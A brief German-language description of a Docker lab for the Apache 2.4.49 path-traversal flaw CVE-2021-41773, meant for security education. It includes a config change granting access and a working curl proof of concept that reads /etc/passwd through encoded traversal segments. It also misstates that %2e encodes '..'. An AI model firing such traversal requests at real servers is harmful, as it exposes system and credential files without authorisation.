
Docker-basierte Laborumgebung für die CVE-2021-41773 Apache-Pfad-Traversal-Sicherheitslücke mit PoC-Exploit und detaillierter Anleitung für Sicherheitstests und Bildung.
-> Basis-Image: httpd:2.4.49 (Version mit der Schwachstelle)
-> 'sed -i 's/Require all denied/Require all granted/g' : Path Traversal erlauben und externen Zugriff ermöglichen
-> Apache definieren
-> Port 8080 auf den Container-Port 80 mappen
docker ausführen
PoC ausführen
-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
-> /etc/passwd enthält sensible Informationen; %2e ist die kodierte Version von .., was den Aufstieg in übergeordnete Verzeichnisse bewirkt
-> Durch Pfadmanipulation wird der Server gezwungen, auf /etc/passwd zuzugreifen und diese Datei auszugeben
-> Wie im Bild zu sehen, kann auf sensible Verzeichnisse zugegriffen werden
https://github.com/JIYUN02/cve-2021-41773
-> Commit-Verlauf vorhanden